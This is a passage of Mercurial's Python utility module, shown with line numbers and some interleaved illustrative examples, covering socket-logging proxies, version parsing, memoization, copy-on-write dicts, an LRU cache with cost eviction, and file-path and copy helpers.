1013 1013 b'%s> recvfrom(%d, %d) -> %d'
1014 1014 % (self.name, size, flags, len(res[0]))
1015 1015 )
1016 1016
1017 1017 self._writedata(res[0])
1018 1018
1019 1019 def recvfrom_into(self, res, buf, size, flags=0):
1020 1020 if not self.reads:
1021 1021 return
1022 1022
1023 1023 if self.logdataapis:
1024 1024 self.fh.write(
1025 1025 b'%s> recvfrom_into(%d, %d) -> %d'
1026 1026 % (self.name, size, flags, res[0])
1027 1027 )
1028 1028
1029 1029 self._writedata(buf[0 : res[0]])
1030 1030
1031 1031 def recv_into(self, res, buf, size=0, flags=0):
1032 1032 if not self.reads:
1033 1033 return
1034 1034
1035 1035 if self.logdataapis:
1036 1036 self.fh.write(
1037 1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1038 1038 )
1039 1039
1040 1040 self._writedata(buf[0:res])
1041 1041
1042 1042 def send(self, res, data, flags=0):
1043 1043 if not self.writes:
1044 1044 return
1045 1045
1046 1046 self.fh.write(
1047 1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1048 1048 )
1049 1049 self._writedata(data)
1050 1050
1051 1051 def sendall(self, res, data, flags=0):
1052 1052 if not self.writes:
1053 1053 return
1054 1054
1055 1055 if self.logdataapis:
1056 1056 # Returns None on success. So don't bother reporting return value.
1057 1057 self.fh.write(
1058 1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1059 1059 )
1060 1060
1061 1061 self._writedata(data)
1062 1062
1063 1063 def sendto(self, res, data, flagsoraddress, address=None):
1064 1064 if not self.writes:
1065 1065 return
1066 1066
1067 1067 if address:
1068 1068 flags = flagsoraddress
1069 1069 else:
1070 1070 flags = 0
1071 1071
1072 1072 if self.logdataapis:
1073 1073 self.fh.write(
1074 1074 b'%s> sendto(%d, %d, %r) -> %d'
1075 1075 % (self.name, len(data), flags, address, res)
1076 1076 )
1077 1077
1078 1078 self._writedata(data)
1079 1079
1080 1080 def setblocking(self, res, flag):
1081 1081 if not self.states:
1082 1082 return
1083 1083
1084 1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1085 1085
1086 1086 def settimeout(self, res, value):
1087 1087 if not self.states:
1088 1088 return
1089 1089
1090 1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1091 1091
1092 1092 def gettimeout(self, res):
1093 1093 if not self.states:
1094 1094 return
1095 1095
1096 1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1097 1097
1098 1098 def setsockopt(self, res, level, optname, value):
1099 1099 if not self.states:
1100 1100 return
1101 1101
1102 1102 self.fh.write(
1103 1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1104 1104 % (self.name, level, optname, value, res)
1105 1105 )
1106 1106
1107 1107
1108 1108 def makeloggingsocket(
1109 1109 logh,
1110 1110 fh,
1111 1111 name,
1112 1112 reads=True,
1113 1113 writes=True,
1114 1114 states=True,
1115 1115 logdata=False,
1116 1116 logdataapis=True,
1117 1117 ):
1118 1118 """Turn a socket into a logging socket."""
1119 1119
1120 1120 observer = socketobserver(
1121 1121 logh,
1122 1122 name,
1123 1123 reads=reads,
1124 1124 writes=writes,
1125 1125 states=states,
1126 1126 logdata=logdata,
1127 1127 logdataapis=logdataapis,
1128 1128 )
1129 1129 return socketproxy(fh, observer)
1130 1130
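# Illustrative sketch (assumes socket.socketpair() is available, as on any
# modern POSIX or Windows Python): observe one side of a socket pair.
def _makeloggingsocket_example():
    s1, s2 = socket.socketpair()
    client = makeloggingsocket(procutil.stderr, s1, b'client', logdata=True)
    client.sendall(b'ping')  # logged roughly as: client> sendall(4, 0): ping
    s2.sendall(b'pong')
    return client.recv(4)  # logged roughly as: client> recv(4, 0) -> 4: pong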
1131 1131
1132 1132 def version():
1133 1133 """Return version information if available."""
1134 1134 try:
1135 1135 from . import __version__
1136 1136
1137 1137 return __version__.version
1138 1138 except ImportError:
1139 1139 return b'unknown'
1140 1140
1141 1141
1142 1142 def versiontuple(v=None, n=4):
1143 1143 """Parses a Mercurial version string into an N-tuple.
1144 1144
1145 1145 The version string to be parsed is specified with the ``v`` argument.
1146 1146 If it isn't defined, the current Mercurial version string will be parsed.
1147 1147
1148 1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1149 1149 returned values:
1150 1150
1151 1151 >>> v = b'3.6.1+190-df9b73d2d444'
1152 1152 >>> versiontuple(v, 2)
1153 1153 (3, 6)
1154 1154 >>> versiontuple(v, 3)
1155 1155 (3, 6, 1)
1156 1156 >>> versiontuple(v, 4)
1157 1157 (3, 6, 1, '190-df9b73d2d444')
1158 1158
1159 1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1160 1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1161 1161
1162 1162 >>> v = b'3.6'
1163 1163 >>> versiontuple(v, 2)
1164 1164 (3, 6)
1165 1165 >>> versiontuple(v, 3)
1166 1166 (3, 6, None)
1167 1167 >>> versiontuple(v, 4)
1168 1168 (3, 6, None, None)
1169 1169
1170 1170 >>> v = b'3.9-rc'
1171 1171 >>> versiontuple(v, 2)
1172 1172 (3, 9)
1173 1173 >>> versiontuple(v, 3)
1174 1174 (3, 9, None)
1175 1175 >>> versiontuple(v, 4)
1176 1176 (3, 9, None, 'rc')
1177 1177
1178 1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1179 1179 >>> versiontuple(v, 2)
1180 1180 (3, 9)
1181 1181 >>> versiontuple(v, 3)
1182 1182 (3, 9, None)
1183 1183 >>> versiontuple(v, 4)
1184 1184 (3, 9, None, 'rc+2-02a8fea4289b')
1185 1185
1186 1186 >>> versiontuple(b'4.6rc0')
1187 1187 (4, 6, None, 'rc0')
1188 1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1189 1189 (4, 6, None, 'rc0+12-425d55e54f98')
1190 1190 >>> versiontuple(b'.1.2.3')
1191 1191 (None, None, None, '.1.2.3')
1192 1192 >>> versiontuple(b'12.34..5')
1193 1193 (12, 34, None, '..5')
1194 1194 >>> versiontuple(b'1.2.3.4.5.6')
1195 1195 (1, 2, 3, '.4.5.6')
1196 1196 """
1197 1197 if not v:
1198 1198 v = version()
1199 1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1200 1200 if not m:
1201 1201 vparts, extra = b'', v
1202 1202 elif m.group(2):
1203 1203 vparts, extra = m.groups()
1204 1204 else:
1205 1205 vparts, extra = m.group(1), None
1206 1206
1207 1207 assert vparts is not None # help pytype
1208 1208
1209 1209 vints = []
1210 1210 for i in vparts.split(b'.'):
1211 1211 try:
1212 1212 vints.append(int(i))
1213 1213 except ValueError:
1214 1214 break
1215 1215 # (3, 6) -> (3, 6, None)
1216 1216 while len(vints) < 3:
1217 1217 vints.append(None)
1218 1218
1219 1219 if n == 2:
1220 1220 return (vints[0], vints[1])
1221 1221 if n == 3:
1222 1222 return (vints[0], vints[1], vints[2])
1223 1223 if n == 4:
1224 1224 return (vints[0], vints[1], vints[2], extra)
1225 1225
1226 1226
1227 1227 def cachefunc(func):
1228 1228 '''cache the result of function calls'''
1229 1229 # XXX doesn't handle keywords args
1230 1230 if func.__code__.co_argcount == 0:
1231 1231 listcache = []
1232 1232
1233 1233 def f():
1234 1234 if len(listcache) == 0:
1235 1235 listcache.append(func())
1236 1236 return listcache[0]
1237 1237
1238 1238 return f
1239 1239 cache = {}
1240 1240 if func.__code__.co_argcount == 1:
1241 1241 # we gain a small amount of time because
1242 1242 # we don't need to pack/unpack the list
1243 1243 def f(arg):
1244 1244 if arg not in cache:
1245 1245 cache[arg] = func(arg)
1246 1246 return cache[arg]
1247 1247
1248 1248 else:
1249 1249
1250 1250 def f(*args):
1251 1251 if args not in cache:
1252 1252 cache[args] = func(*args)
1253 1253 return cache[args]
1254 1254
1255 1255 return f
1256 1256
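# Illustrative sketch (example function only): the memoized wrapper calls
# the underlying function once per distinct argument.
def _cachefunc_example():
    calls = []

    def square(x):
        calls.append(x)
        return x * x

    cached = cachefunc(square)
    assert cached(3) == 9 and cached(3) == 9
    return len(calls)  # 1: the second call was served from the cache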
1257 1257
1258 1258 class cow(object):
1259 1259 """helper class to make copy-on-write easier
1260 1260
1261 1261 Call preparewrite before doing any writes.
1262 1262 """
1263 1263
1264 1264 def preparewrite(self):
1265 1265 """call this before writes, return self or a copied new object"""
1266 1266 if getattr(self, '_copied', 0):
1267 1267 self._copied -= 1
1268 1268 return self.__class__(self)
1269 1269 return self
1270 1270
1271 1271 def copy(self):
1272 1272 """always do a cheap copy"""
1273 1273 self._copied = getattr(self, '_copied', 0) + 1
1274 1274 return self
1275 1275
1276 1276
1277 1277 class sortdict(collections.OrderedDict):
1278 1278 """a simple sorted dictionary
1279 1279
1280 1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 1281 >>> d2 = d1.copy()
1282 1282 >>> d2
1283 1283 sortdict([('a', 0), ('b', 1)])
1284 1284 >>> d2.update([(b'a', 2)])
1285 1285 >>> list(d2.keys()) # should still be in last-set order
1286 1286 ['b', 'a']
1287 1287 >>> d1.insert(1, b'a.5', 0.5)
1288 1288 >>> d1
1289 1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 1290 """
1291 1291
1292 1292 def __setitem__(self, key, value):
1293 1293 if key in self:
1294 1294 del self[key]
1295 1295 super(sortdict, self).__setitem__(key, value)
1296 1296
1297 1297 if pycompat.ispypy:
1298 1298 # __setitem__() isn't called as of PyPy 5.8.0
1299 1299 def update(self, src):
1300 1300 if isinstance(src, dict):
1301 1301 src = pycompat.iteritems(src)
1302 1302 for k, v in src:
1303 1303 self[k] = v
1304 1304
1305 1305 def insert(self, position, key, value):
1306 1306 for (i, (k, v)) in enumerate(list(self.items())):
1307 1307 if i == position:
1308 1308 self[key] = value
1309 1309 if i >= position:
1310 1310 del self[k]
1311 1311 self[k] = v
1312 1312
1313 1313
1314 1314 class cowdict(cow, dict):
1315 1315 """copy-on-write dict
1316 1316
1317 1317 Be sure to call d = d.preparewrite() before writing to d.
1318 1318
1319 1319 >>> a = cowdict()
1320 1320 >>> a is a.preparewrite()
1321 1321 True
1322 1322 >>> b = a.copy()
1323 1323 >>> b is a
1324 1324 True
1325 1325 >>> c = b.copy()
1326 1326 >>> c is a
1327 1327 True
1328 1328 >>> a = a.preparewrite()
1329 1329 >>> b is a
1330 1330 False
1331 1331 >>> a is a.preparewrite()
1332 1332 True
1333 1333 >>> c = c.preparewrite()
1334 1334 >>> b is c
1335 1335 False
1336 1336 >>> b is b.preparewrite()
1337 1337 True
1338 1338 """
1339 1339
1340 1340
1341 1341 class cowsortdict(cow, sortdict):
1342 1342 """copy-on-write sortdict
1343 1343
1344 1344 Be sure to call d = d.preparewrite() before writing to d.
1345 1345 """
1346 1346
1347 1347
1348 1348 class transactional(object): # pytype: disable=ignored-metaclass
1349 1349 """Base class for making a transactional type into a context manager."""
1350 1350
1351 1351 __metaclass__ = abc.ABCMeta
1352 1352
1353 1353 @abc.abstractmethod
1354 1354 def close(self):
1355 1355 """Successfully closes the transaction."""
1356 1356
1357 1357 @abc.abstractmethod
1358 1358 def release(self):
1359 1359 """Marks the end of the transaction.
1360 1360
1361 1361 If the transaction has not been closed, it will be aborted.
1362 1362 """
1363 1363
1364 1364 def __enter__(self):
1365 1365 return self
1366 1366
1367 1367 def __exit__(self, exc_type, exc_val, exc_tb):
1368 1368 try:
1369 1369 if exc_type is None:
1370 1370 self.close()
1371 1371 finally:
1372 1372 self.release()
1373 1373
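# Illustrative sketch (hypothetical subclass): concrete transactions only
# implement close() and release(); the context manager protocol above then
# guarantees close() on success and release() in all cases.
class _exampletransaction(transactional):
    def close(self):
        print('committed')

    def release(self):
        print('released')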
1374 1374
1375 1375 @contextlib.contextmanager
1376 1376 def acceptintervention(tr=None):
1377 1377 """A context manager that closes the transaction on InterventionRequired
1378 1378
1379 1379 If no transaction was provided, this simply runs the body and returns
1380 1380 """
1381 1381 if not tr:
1382 1382 yield
1383 1383 return
1384 1384 try:
1385 1385 yield
1386 1386 tr.close()
1387 1387 except error.InterventionRequired:
1388 1388 tr.close()
1389 1389 raise
1390 1390 finally:
1391 1391 tr.release()
1392 1392
1393 1393
1394 1394 @contextlib.contextmanager
1395 1395 def nullcontextmanager(enter_result=None):
1396 1396 yield enter_result
1397 1397
1398 1398
1399 1399 class _lrucachenode(object):
1400 1400 """A node in a doubly linked list.
1401 1401
1402 1402 Holds a reference to nodes on either side as well as a key-value
1403 1403 pair for the dictionary entry.
1404 1404 """
1405 1405
1406 1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1407 1407
1408 1408 def __init__(self):
1409 1409 self.next = None
1410 1410 self.prev = None
1411 1411
1412 1412 self.key = _notset
1413 1413 self.value = None
1414 1414 self.cost = 0
1415 1415
1416 1416 def markempty(self):
1417 1417 """Mark the node as emptied."""
1418 1418 self.key = _notset
1419 1419 self.value = None
1420 1420 self.cost = 0
1421 1421
1422 1422
1423 1423 class lrucachedict(object):
1424 1424 """Dict that caches most recent accesses and sets.
1425 1425
1426 1426 The dict consists of an actual backing dict - indexed by original
1427 1427 key - and a doubly linked circular list defining the order of entries in
1428 1428 the cache.
1429 1429
1430 1430 The head node is the newest entry in the cache. If the cache is full,
1431 1431 we recycle head.prev and make it the new head. Cache accesses result in
1432 1432 the node being moved to before the existing head and being marked as the
1433 1433 new head node.
1434 1434
1435 1435 Items in the cache can be inserted with an optional "cost" value. This is
1436 1436 simply an integer that is specified by the caller. The cache can be queried
1437 1437 for the total cost of all items presently in the cache.
1438 1438
1439 1439 The cache can also define a maximum cost. If a cache insertion would
1440 1440 cause the total cost of the cache to go beyond the maximum cost limit,
1441 1441 nodes will be evicted to make room for the new node. This can be used
1442 1442 to e.g. set a max memory limit and associate an estimated bytes size
1443 1443 cost to each item in the cache. By default, no maximum cost is enforced.
1444 1444 """
1445 1445
1446 1446 def __init__(self, max, maxcost=0):
1447 1447 self._cache = {}
1448 1448
1449 1449 self._head = head = _lrucachenode()
1450 1450 head.prev = head
1451 1451 head.next = head
1452 1452 self._size = 1
1453 1453 self.capacity = max
1454 1454 self.totalcost = 0
1455 1455 self.maxcost = maxcost
1456 1456
1457 1457 def __len__(self):
1458 1458 return len(self._cache)
1459 1459
1460 1460 def __contains__(self, k):
1461 1461 return k in self._cache
1462 1462
1463 1463 def __iter__(self):
1464 1464 # We don't have to iterate in cache order, but why not.
1465 1465 n = self._head
1466 1466 for i in range(len(self._cache)):
1467 1467 yield n.key
1468 1468 n = n.next
1469 1469
1470 1470 def __getitem__(self, k):
1471 1471 node = self._cache[k]
1472 1472 self._movetohead(node)
1473 1473 return node.value
1474 1474
1475 1475 def insert(self, k, v, cost=0):
1476 1476 """Insert a new item in the cache with optional cost value."""
1477 1477 node = self._cache.get(k)
1478 1478 # Replace existing value and mark as newest.
1479 1479 if node is not None:
1480 1480 self.totalcost -= node.cost
1481 1481 node.value = v
1482 1482 node.cost = cost
1483 1483 self.totalcost += cost
1484 1484 self._movetohead(node)
1485 1485
1486 1486 if self.maxcost:
1487 1487 self._enforcecostlimit()
1488 1488
1489 1489 return
1490 1490
1491 1491 if self._size < self.capacity:
1492 1492 node = self._addcapacity()
1493 1493 else:
1494 1494 # Grab the last/oldest item.
1495 1495 node = self._head.prev
1496 1496
1497 1497 # At capacity. Kill the old entry.
1498 1498 if node.key is not _notset:
1499 1499 self.totalcost -= node.cost
1500 1500 del self._cache[node.key]
1501 1501
1502 1502 node.key = k
1503 1503 node.value = v
1504 1504 node.cost = cost
1505 1505 self.totalcost += cost
1506 1506 self._cache[k] = node
1507 1507 # And mark it as newest entry. No need to adjust order since it
1508 1508 # is already self._head.prev.
1509 1509 self._head = node
1510 1510
1511 1511 if self.maxcost:
1512 1512 self._enforcecostlimit()
1513 1513
1514 1514 def __setitem__(self, k, v):
1515 1515 self.insert(k, v)
1516 1516
1517 1517 def __delitem__(self, k):
1518 1518 self.pop(k)
1519 1519
1520 1520 def pop(self, k, default=_notset):
1521 1521 try:
1522 1522 node = self._cache.pop(k)
1523 1523 except KeyError:
1524 1524 if default is _notset:
1525 1525 raise
1526 1526 return default
1527 1527
1528 1528 assert node is not None # help pytype
1529 1529 value = node.value
1530 1530 self.totalcost -= node.cost
1531 1531 node.markempty()
1532 1532
1533 1533 # Temporarily mark as newest item before re-adjusting head to make
1534 1534 # this node the oldest item.
1535 1535 self._movetohead(node)
1536 1536 self._head = node.next
1537 1537
1538 1538 return value
1539 1539
1540 1540 # Additional dict methods.
1541 1541
1542 1542 def get(self, k, default=None):
1543 1543 try:
1544 1544 return self.__getitem__(k)
1545 1545 except KeyError:
1546 1546 return default
1547 1547
1548 1548 def peek(self, k, default=_notset):
1549 1549 """Get the specified item without moving it to the head
1550 1550
1551 1551 Unlike get(), this doesn't mutate the internal state. But be aware
1552 1552 that this does not mean peek() is thread-safe.
1553 1553 """
1554 1554 try:
1555 1555 node = self._cache[k]
1556 1556 return node.value
1557 1557 except KeyError:
1558 1558 if default is _notset:
1559 1559 raise
1560 1560 return default
1561 1561
1562 1562 def clear(self):
1563 1563 n = self._head
1564 1564 while n.key is not _notset:
1565 1565 self.totalcost -= n.cost
1566 1566 n.markempty()
1567 1567 n = n.next
1568 1568
1569 1569 self._cache.clear()
1570 1570
1571 1571 def copy(self, capacity=None, maxcost=0):
1572 1572 """Create a new cache as a copy of the current one.
1573 1573
1574 1574 By default, the new cache has the same capacity as the existing one.
1575 1575 But, the cache capacity can be changed as part of performing the
1576 1576 copy.
1577 1577
1578 1578 Items in the copy have an insertion/access order matching this
1579 1579 instance.
1580 1580 """
1581 1581
1582 1582 capacity = capacity or self.capacity
1583 1583 maxcost = maxcost or self.maxcost
1584 1584 result = lrucachedict(capacity, maxcost=maxcost)
1585 1585
1586 1586 # We copy entries by iterating in oldest-to-newest order so the copy
1587 1587 # has the correct ordering.
1588 1588
1589 1589 # Find the first non-empty entry.
1590 1590 n = self._head.prev
1591 1591 while n.key is _notset and n is not self._head:
1592 1592 n = n.prev
1593 1593
1594 1594 # We could potentially skip the first N items when decreasing capacity.
1595 1595 # But let's keep it simple unless it is a performance problem.
1596 1596 for i in range(len(self._cache)):
1597 1597 result.insert(n.key, n.value, cost=n.cost)
1598 1598 n = n.prev
1599 1599
1600 1600 return result
1601 1601
1602 1602 def popoldest(self):
1603 1603 """Remove the oldest item from the cache.
1604 1604
1605 1605 Returns the (key, value) describing the removed cache entry.
1606 1606 """
1607 1607 if not self._cache:
1608 1608 return
1609 1609
1610 1610 # Walk the linked list backwards starting at tail node until we hit
1611 1611 # a non-empty node.
1612 1612 n = self._head.prev
1613 1613 while n.key is _notset:
1614 1614 n = n.prev
1615 1615
1616 1616 assert n is not None # help pytype
1617 1617
1618 1618 key, value = n.key, n.value
1619 1619
1620 1620 # And remove it from the cache and mark it as empty.
1621 1621 del self._cache[n.key]
1622 1622 self.totalcost -= n.cost
1623 1623 n.markempty()
1624 1624
1625 1625 return key, value
1626 1626
1627 1627 def _movetohead(self, node):
1628 1628 """Mark a node as the newest, making it the new head.
1629 1629
1630 1630 When a node is accessed, it becomes the freshest entry in the LRU
1631 1631 list, which is denoted by self._head.
1632 1632
1633 1633 Visually, let's make ``N`` the new head node (* denotes head):
1634 1634
1635 1635 previous/oldest <-> head <-> next/next newest
1636 1636
1637 1637 ----<->--- A* ---<->-----
1638 1638 | |
1639 1639 E <-> D <-> N <-> C <-> B
1640 1640
1641 1641 To:
1642 1642
1643 1643 ----<->--- N* ---<->-----
1644 1644 | |
1645 1645 E <-> D <-> C <-> B <-> A
1646 1646
1647 1647 This requires the following moves:
1648 1648
1649 1649 C.next = D (node.prev.next = node.next)
1650 1650 D.prev = C (node.next.prev = node.prev)
1651 1651 E.next = N (head.prev.next = node)
1652 1652 N.prev = E (node.prev = head.prev)
1653 1653 N.next = A (node.next = head)
1654 1654 A.prev = N (head.prev = node)
1655 1655 """
1656 1656 head = self._head
1657 1657 # C.next = D
1658 1658 node.prev.next = node.next
1659 1659 # D.prev = C
1660 1660 node.next.prev = node.prev
1661 1661 # N.prev = E
1662 1662 node.prev = head.prev
1663 1663 # N.next = A
1664 1664 # It is tempting to do just "head" here, however if node is
1665 1665 # adjacent to head, this will do bad things.
1666 1666 node.next = head.prev.next
1667 1667 # E.next = N
1668 1668 node.next.prev = node
1669 1669 # A.prev = N
1670 1670 node.prev.next = node
1671 1671
1672 1672 self._head = node
1673 1673
1674 1674 def _addcapacity(self):
1675 1675 """Add a node to the circular linked list.
1676 1676
1677 1677 The new node is inserted before the head node.
1678 1678 """
1679 1679 head = self._head
1680 1680 node = _lrucachenode()
1681 1681 head.prev.next = node
1682 1682 node.prev = head.prev
1683 1683 node.next = head
1684 1684 head.prev = node
1685 1685 self._size += 1
1686 1686 return node
1687 1687
1688 1688 def _enforcecostlimit(self):
1689 1689 # This should run after an insertion. It should only be called if total
1690 1690 # cost limits are being enforced.
1691 1691 # The most recently inserted node is never evicted.
1692 1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1693 1693 return
1694 1694
1695 1695 # This is logically equivalent to calling popoldest() until we
1696 1696 # free up enough cost. We don't do that since popoldest() needs
1697 1697 # to walk the linked list and doing this in a loop would be
1698 1698 # quadratic. So we find the first non-empty node and then
1699 1699 # walk nodes until we free up enough capacity.
1700 1700 #
1701 1701 # If we only removed the minimum number of nodes to free enough
1702 1702 # cost at insert time, chances are high that the next insert would
1703 1703 # also require pruning. This would effectively constitute quadratic
1704 1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1705 1705 # target cost that is a percentage of the max cost. This will tend
1706 1706 # to free more nodes when the high water mark is reached, which
1707 1707 # lowers the chances of needing to prune on the subsequent insert.
1708 1708 targetcost = int(self.maxcost * 0.75)
1709 1709
1710 1710 n = self._head.prev
1711 1711 while n.key is _notset:
1712 1712 n = n.prev
1713 1713
1714 1714 while len(self) > 1 and self.totalcost > targetcost:
1715 1715 del self._cache[n.key]
1716 1716 self.totalcost -= n.cost
1717 1717 n.markempty()
1718 1718 n = n.prev
1719 1719
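# Illustrative sketch (values chosen for the example): with a maxcost set,
# an insertion that exceeds the budget evicts older nodes down toward the
# 75% target described in _enforcecostlimit above.
def _lrucachedict_example():
    d = lrucachedict(4, maxcost=100)
    d.insert(b'a', b'v1', cost=60)
    d.insert(b'b', b'v2', cost=60)  # total cost 120 > 100: b'a' is evicted
    return b'a' in d, d.totalcost  # (False, 60)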
1720 1720
1721 1721 def lrucachefunc(func):
1722 1722 '''cache most recent results of function calls'''
1723 1723 cache = {}
1724 1724 order = collections.deque()
1725 1725 if func.__code__.co_argcount == 1:
1726 1726
1727 1727 def f(arg):
1728 1728 if arg not in cache:
1729 1729 if len(cache) > 20:
1730 1730 del cache[order.popleft()]
1731 1731 cache[arg] = func(arg)
1732 1732 else:
1733 1733 order.remove(arg)
1734 1734 order.append(arg)
1735 1735 return cache[arg]
1736 1736
1737 1737 else:
1738 1738
1739 1739 def f(*args):
1740 1740 if args not in cache:
1741 1741 if len(cache) > 20:
1742 1742 del cache[order.popleft()]
1743 1743 cache[args] = func(*args)
1744 1744 else:
1745 1745 order.remove(args)
1746 1746 order.append(args)
1747 1747 return cache[args]
1748 1748
1749 1749 return f
1750 1750
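# Illustrative sketch (example function only): like cachefunc, but only the
# most recent ~20 distinct argument values stay cached.
def _lrucachefunc_example():
    seen = []

    def double(x):
        seen.append(x)
        return x * 2

    cached = lrucachefunc(double)
    cached(1)
    cached(1)  # cache hit; ``double`` does not run again
    return len(seen)  # 1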
1751 1751
1752 1752 class propertycache(object):
1753 1753 def __init__(self, func):
1754 1754 self.func = func
1755 1755 self.name = func.__name__
1756 1756
1757 1757 def __get__(self, obj, type=None):
1758 1758 result = self.func(obj)
1759 1759 self.cachevalue(obj, result)
1760 1760 return result
1761 1761
1762 1762 def cachevalue(self, obj, value):
1763 1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1764 1764 obj.__dict__[self.name] = value
1765 1765
1766 1766
1767 1767 def clearcachedproperty(obj, prop):
1768 1768 '''clear a cached property value, if one has been set'''
1769 1769 prop = pycompat.sysstr(prop)
1770 1770 if prop in obj.__dict__:
1771 1771 del obj.__dict__[prop]
1772 1772
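# Illustrative sketch (hypothetical class): the decorated method runs on the
# first attribute access, the value lands in the instance __dict__, and
# clearcachedproperty() forces recomputation on the next access.
class _propertycacheexample(object):
    @propertycache
    def answer(self):
        return 42  # computed only on the first access

# usage: obj = _propertycacheexample(); obj.answer caches 42;
# clearcachedproperty(obj, b'answer') drops the cached value.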
1773 1773
1774 1774 def increasingchunks(source, min=1024, max=65536):
1775 1775 """return no less than min bytes per chunk while data remains,
1776 1776 doubling min after each chunk until it reaches max"""
1777 1777
1778 1778 def log2(x):
1779 1779 if not x:
1780 1780 return 0
1781 1781 i = 0
1782 1782 while x:
1783 1783 x >>= 1
1784 1784 i += 1
1785 1785 return i - 1
1786 1786
1787 1787 buf = []
1788 1788 blen = 0
1789 1789 for chunk in source:
1790 1790 buf.append(chunk)
1791 1791 blen += len(chunk)
1792 1792 if blen >= min:
1793 1793 if min < max:
1794 1794 min = min << 1
1795 1795 nmin = 1 << log2(blen)
1796 1796 if nmin > min:
1797 1797 min = nmin
1798 1798 if min > max:
1799 1799 min = max
1800 1800 yield b''.join(buf)
1801 1801 blen = 0
1802 1802 buf = []
1803 1803 if buf:
1804 1804 yield b''.join(buf)
1805 1805
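# Illustrative sketch (the sizes shown are what the algorithm yields for
# this input): one hundred 100-byte chunks coalesce into roughly doubling
# output chunks, capped at ``max``.
def _increasingchunks_example():
    source = (b'x' * 100 for _ in range(100))
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    return sizes  # [1100, 2100, 4100, 2700]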
1806 1806
1807 1807 def always(fn):
1808 1808 return True
1809 1809
1810 1810
1811 1811 def never(fn):
1812 1812 return False
1813 1813
1814 1814
1815 1815 def nogc(func):
1816 1816 """disable garbage collector
1817 1817
1818 1818 Python's garbage collector triggers a GC each time a certain number of
1819 1819 container objects (the number being defined by gc.get_threshold()) are
1820 1820 allocated even when marked not to be tracked by the collector. Tracking has
1821 1821 no effect on when GCs are triggered, only on what objects the GC looks
1822 1822 into. As a workaround, disable GC while building complex (huge)
1823 1823 containers.
1824 1824
1825 1825 This garbage collector issue has been fixed in 2.7, but it still
1826 1826 affects CPython's performance.
1827 1827 """
1828 1828
1829 1829 def wrapper(*args, **kwargs):
1830 1830 gcenabled = gc.isenabled()
1831 1831 gc.disable()
1832 1832 try:
1833 1833 return func(*args, **kwargs)
1834 1834 finally:
1835 1835 if gcenabled:
1836 1836 gc.enable()
1837 1837
1838 1838 return wrapper
1839 1839
1840 1840
1841 1841 if pycompat.ispypy:
1842 1842 # PyPy runs slower with gc disabled
1843 1843 nogc = lambda x: x
1844 1844
1845 1845
1846 1846 def pathto(root, n1, n2):
1847 1847 # type: (bytes, bytes, bytes) -> bytes
1848 1848 """return the relative path from one place to another.
1849 1849 root should use os.sep to separate directories
1850 1850 n1 should use os.sep to separate directories
1851 1851 n2 should use "/" to separate directories
1852 1852 returns an os.sep-separated path.
1853 1853
1854 1854 If n1 is a relative path, it's assumed it's
1855 1855 relative to root.
1856 1856 n2 should always be relative to root.
1857 1857 """
1858 1858 if not n1:
1859 1859 return localpath(n2)
1860 1860 if os.path.isabs(n1):
1861 1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1862 1862 return os.path.join(root, localpath(n2))
1863 1863 n2 = b'/'.join((pconvert(root), n2))
1864 1864 a, b = splitpath(n1), n2.split(b'/')
1865 1865 a.reverse()
1866 1866 b.reverse()
1867 1867 while a and b and a[-1] == b[-1]:
1868 1868 a.pop()
1869 1869 b.pop()
1870 1870 b.reverse()
1871 1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1872 1872
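# For example, on a POSIX system (a sketch; the result is os.sep-separated):
#
#     pathto(b'/repo', b'a/b', b'c/d')   # -> b'../../c/d'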
1873 1873
1874 1874 def checksignature(func, depth=1):
1875 1875 '''wrap a function with code to check for calling errors'''
1876 1876
1877 1877 def check(*args, **kwargs):
1878 1878 try:
1879 1879 return func(*args, **kwargs)
1880 1880 except TypeError:
1881 1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1882 1882 raise error.SignatureError
1883 1883 raise
1884 1884
1885 1885 return check
1886 1886
1887 1887
1888 1888 # a whitelist of known filesystems where hardlinks work reliably
1889 1889 _hardlinkfswhitelist = {
1890 1890 b'apfs',
1891 1891 b'btrfs',
1892 1892 b'ext2',
1893 1893 b'ext3',
1894 1894 b'ext4',
1895 1895 b'hfs',
1896 1896 b'jfs',
1897 1897 b'NTFS',
1898 1898 b'reiserfs',
1899 1899 b'tmpfs',
1900 1900 b'ufs',
1901 1901 b'xfs',
1902 1902 b'zfs',
1903 1903 }
1904 1904
1905 1905
1906 1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1907 1907 """copy a file, preserving mode and optionally other stat info like
1908 1908 atime/mtime
1909 1909
1910 1910 checkambig argument is used with filestat, and is useful only if
1911 1911 destination file is guarded by any lock (e.g. repo.lock or
1912 1912 repo.wlock).
1913 1913
1914 1914 copystat and checkambig should be exclusive.
1915 1915 """
1916 1916 assert not (copystat and checkambig)
1917 1917 oldstat = None
1918 1918 if os.path.lexists(dest):
1919 1919 if checkambig:
1920 1920 oldstat = checkambig and filestat.frompath(dest)
1921 1921 unlink(dest)
1922 1922 if hardlink:
1923 1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1924 1924 # unless we are confident that dest is on a whitelisted filesystem.
1925 1925 try:
1926 1926 fstype = getfstype(os.path.dirname(dest))
1927 1927 except OSError:
1928 1928 fstype = None
